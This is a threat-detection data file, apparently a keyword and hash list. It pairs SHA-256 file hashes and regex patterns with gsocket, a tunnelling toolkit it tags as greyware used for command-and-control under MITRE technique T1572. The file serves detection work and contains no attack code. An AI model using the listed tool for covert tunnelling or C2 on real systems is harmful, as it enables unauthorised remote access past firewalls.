"*1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf*",".{0,1000}1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369*",".{0,1000}1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64*",".{0,1000}2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30*",".{0,1000}2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6*",".{0,1000}22f6a8fb8771a0ed253a3652c6852a831b4919b2a677ddb6a6d03cad6a0f76f6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908*",".{0,1000}22fdc29d790bb072a0bd54651adab4892fb1df1c75fb44388c3d6a0b0506d908.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560*",".{0,1000}25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72*",".{0,1000}269d5ebc2a387173830bd5aa8f622c4a9787ff60379bcc960febfe950927ae72.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1*",".{0,1000}2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de*",".{0,1000}2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849*",".{0,1000}2e7d5dfd64c9741ef27284fa9e9e20f84da15669b6979daf730974f7da356849.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6*",".{0,1000}30d80944d6e4ecec3421db4532a9a146f882e381454e2e09ea35845a4da1f9c6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048*",".{0,1000}37328d4092b0c2cf9e23443a1575078c0a072e0ca39382e27c8e9c177bad2048.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef*",".{0,1000}3891197c6740b1864b7a01b8d64b917fded55d40516b5e2774c92e92fc2ed5ef.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9*",".{0,1000}3906359d473ef56efef773c5bcbd0c8f8df1b3f18e90fc0d0c8f4c2112706ea9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e*",".{0,1000}3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9*",".{0,1000}4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441*",".{0,1000}41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae*",".{0,1000}44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949*",".{0,1000}453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6*",".{0,1000}48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf*",".{0,1000}4ad964e61bd5f63da0f48dfdbf4252550a4a8f894bf3c0813b3eb0dab6ac73bf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d*",".{0,1000}4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59*",".{0,1000}4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f*",".{0,1000}4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844*",".{0,1000}4d6434d5a809c797570c59fd91eecd4f86b85e46cc6a43cf186a10a08db5e844.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k=*",".{0,1000}4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k\=.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5*",".{0,1000}4f64f71a7d6b8be79754e7bf2109675ffc8a3e37a4a55b08c95a1b1d25e458e5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7*",".{0,1000}512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230*",".{0,1000}561cc9eca17d61f99abf5fd5257bed4a8bf2d4c8c67ac731f5f067cf5f88e230.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911*",".{0,1000}5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c*",".{0,1000}5b4dd71b0d9ac18c80db2eb0149e56af6b01533ff1e7a28359ca2f61ee0f8c8c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14*",".{0,1000}5bbc850a274b933a4e8b0ac7d5bc8b0527c3eddbaee7f8a9389c284f27a6fe14.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5*",".{0,1000}5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5*",".{0,1000}5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e*",".{0,1000}628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671*",".{0,1000}64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8*",".{0,1000}64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c*",".{0,1000}668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f*",".{0,1000}67552b46f859511333d63e26a980b251e458c474243aa2af4c2f697aaea3680f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73*",".{0,1000}6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a*",".{0,1000}6d0156efe079ba8f6fbb009df73332e5dab53955613b1795f09b431cf668163a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2*",".{0,1000}70fae385cd6c9bbcc73c17efabd236f0a0bfe00d11b0c9360651ec7e4baf42c2.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3*",".{0,1000}70fc96e2f1e0cd752068e94fb4f37b3f19d670243921f76b0f2114578151f1e3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f*",".{0,1000}74f93a2398222f802089239c9610a21ea5ff34fb81cf6869f58bf5782ea5127f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3*",".{0,1000}750b490f1788db4c843135e409ae3175cff1be5c61246341eabdfa135ac6c7e3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281*",".{0,1000}75a064400fdf9acdbedb430ed009b961041fa379b4f219304477102f9f3d4281.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc*",".{0,1000}75f3f565f1024b367a72a934cff9735e3fd9311ce5ad77de20c103cc72442edc.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547*",".{0,1000}78792f8846332fa4d48b2710fd1d5d0bc6dd1fdbd62fdfed2c9aefa91b486547.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07*",".{0,1000}7896c394ae338f34d46c51c5403ee41200a3fb1816763a4763c1228a72febe07.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6*",".{0,1000}78ba173f30785ce45c8aa96e9cd13578d1db9bf48bece39a50617a8a49dd80f6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f*",".{0,1000}7b1f95fad0a9d54d14ec51545fa5739a6b0764117843a3d468f387cfbe133e6f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883*",".{0,1000}7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2*",".{0,1000}813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4*",".{0,1000}840be30a16f12a6c57f8f68233b6aedb9e10e7dda76b1024b74fd660f3a13cd4.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b*",".{0,1000}850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
